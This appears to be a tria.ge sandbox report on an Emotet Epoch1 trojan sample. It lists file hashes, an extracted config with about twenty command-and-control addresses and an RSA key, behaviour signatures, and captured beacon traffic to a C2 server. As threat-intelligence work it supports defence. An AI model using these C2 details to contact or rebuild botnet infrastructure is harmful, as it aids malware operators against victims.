Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

fbdfa9073f...18.exe

windows7-x64

10

fbdfa9073f...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/09/2024, 08:16 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe

  • Size

    316KB

  • MD5

    fbdfa9073f7e435f26ad9582ee23a7b7

  • SHA1

    c53875bdfa7d6df7f2b1a6238f55b7824cdc201c

  • SHA256

    c6722b179de4ab30e1bacc3bf16e458da1fbf7ffc8e56904c1ac98f351b4612c

  • SHA512

    b88a0531726072469a5a6695d8702429083aed1e97be0130451147ba845d48e1d7fd8cfa4ed6eaa07154fe0ede8f85bfd7c6bb76379a62a1c0f74724ae79a720

  • SSDEEP

    6144:a0XYxkiRDCbNniZKxVsllll9TjLcSgtvFSua5ojv7uYNx:a0XyDCbRoKslHTHitvNN

Score
10/10
emotetepoch1bankerdiscoverytrojan

Malware Config

Extracted

Family

emotet

Botnet

Epoch1

C2

76.168.54.203:80

51.38.124.206:80

38.88.126.202:8080

54.37.42.48:8080

5.196.35.138:7080

177.129.17.170:443

87.106.46.107:8080

68.183.190.199:8080

185.183.16.47:80

186.103.141.250:443

64.201.88.132:80

70.32.84.74:8080

68.69.155.181:80

82.76.111.249:443

111.67.12.221:8080

60.93.23.51:80

104.131.41.185:8080

92.24.50.153:80

191.182.6.118:80

61.197.92.216:80
rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6
3
uS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz
4
6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB
5
-----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Emotet payload 3 IoCs

    Detects Emotet payload in memory.

    trojanbanker
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:5560
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4768,i,2904906934812054273,11716976550456127484,262144 --variations-seed-version --mojo-platform-channel-handle=948 /prefetch:8
    1⤵
      PID:3264

    Network

    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      228.249.119.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      228.249.119.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      88.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      88.210.23.2.in-addr.arpa
      IN PTR
      Response
      88.210.23.2.in-addr.arpa
      IN PTR
      a2-23-210-88deploystaticakamaitechnologiescom
    • flag-us
      DNS
      68.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      68.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      196.249.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.249.167.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      28.118.140.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      28.118.140.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      fe3cr.delivery.mp.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      fe3cr.delivery.mp.microsoft.com
      IN A
      Response
      fe3cr.delivery.mp.microsoft.com
      IN CNAME
      fe3.delivery.mp.microsoft.com
      fe3.delivery.mp.microsoft.com
      IN CNAME
      glb.cws.prod.dcat.dsp.trafficmanager.net
      glb.cws.prod.dcat.dsp.trafficmanager.net
      IN A
      13.95.31.18
    • flag-us
      DNS
      50.23.12.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.23.12.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      15.164.165.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      15.164.165.52.in-addr.arpa
      IN PTR
      Response
    • flag-de
      POST
      http://51.38.124.206/tPBMt/58nkUEFibX1aRuT8b/
      fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe
      Remote address:
      51.38.124.206:80
      Request
      POST /tPBMt/58nkUEFibX1aRuT8b/ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      DNT: 1
      Connection: keep-alive
      Referer: 51.38.124.206/tPBMt/58nkUEFibX1aRuT8b/
      Upgrade-Insecure-Requests: 1
      Content-Type: multipart/form-data; boundary=---------xltowVctQ
      Host: 51.38.124.206
      Content-Length: 4596
      Cache-Control: no-cache
      Response
      HTTP/1.1 404 Not Found
      Date: Sat, 28 Sep 2024 08:17:04 GMT
      Server: Apache/2.4.52 (Ubuntu)
      Content-Length: 275
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=iso-8859-1
    • flag-us
      DNS
      206.124.38.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      206.124.38.51.in-addr.arpa
      IN PTR
      Response
      206.124.38.51.in-addr.arpa
      IN PTR
      vps-745068ddvpsovhnet
    • flag-us
      DNS
      83.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      83.210.23.2.in-addr.arpa
      IN PTR
      Response
      83.210.23.2.in-addr.arpa
      IN PTR
      a2-23-210-83deploystaticakamaitechnologiescom
    • 76.168.54.203:80
      fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe
      260 B
       5
    • 51.38.124.206:80
      http://51.38.124.206/tPBMt/58nkUEFibX1aRuT8b/
      http
      fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe
      5.8kB
       796 B
       16
      7

      HTTP Request

      POST http://51.38.124.206/tPBMt/58nkUEFibX1aRuT8b/

      HTTP Response

      404
    • 38.88.126.202:8080
      fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe
      260 B
       5
    • 54.37.42.48:8080
      fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe
      260 B
       5
    • 5.196.35.138:7080
      fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe
      260 B
       200 B
       5
      5
    • 177.129.17.170:443
      fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe
      260 B
       5
    • 87.106.46.107:8080
      fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe
      260 B
       5
    • 68.183.190.199:8080
      fbdfa9073f7e435f26ad9582ee23a7b7_JaffaCakes118.exe
      208 B
       4
    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
       90 B
       1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    • 8.8.8.8:53
      228.249.119.40.in-addr.arpa
      dns
      73 B
       159 B
       1
      1

      DNS Request

      228.249.119.40.in-addr.arpa

    • 8.8.8.8:53
      88.210.23.2.in-addr.arpa
      dns
      70 B
       133 B
       1
      1

      DNS Request

      88.210.23.2.in-addr.arpa

    • 8.8.8.8:53
      68.159.190.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      68.159.190.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
       144 B
       1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      196.249.167.52.in-addr.arpa
      dns
      73 B
       147 B
       1
      1

      DNS Request

      196.249.167.52.in-addr.arpa

    • 8.8.8.8:53
      28.118.140.52.in-addr.arpa
      dns
      149 B
       323 B
       2
      2

      DNS Request

      28.118.140.52.in-addr.arpa

      DNS Request

      fe3cr.delivery.mp.microsoft.com

      DNS Response

      13.95.31.18

    • 8.8.8.8:53
      50.23.12.20.in-addr.arpa
      dns
      70 B
       156 B
       1
      1

      DNS Request

      50.23.12.20.in-addr.arpa

    • 8.8.8.8:53
      15.164.165.52.in-addr.arpa
      dns
      72 B
       146 B
       1
      1

      DNS Request

      15.164.165.52.in-addr.arpa

    • 8.8.8.8:53
      206.124.38.51.in-addr.arpa
      dns
      72 B
       110 B
       1
      1

      DNS Request

      206.124.38.51.in-addr.arpa

    • 8.8.8.8:53
      83.210.23.2.in-addr.arpa
      dns
      70 B
       133 B
       1
      1

      DNS Request

      83.210.23.2.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/5560-1-0x00000000021B0000-0x00000000021C2000-memory.dmp

      Filesize

      72KB

      Download

    • memory/5560-6-0x00000000022E0000-0x00000000022F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/5560-0-0x00000000021A0000-0x00000000021AF000-memory.dmp

      Filesize

      60KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.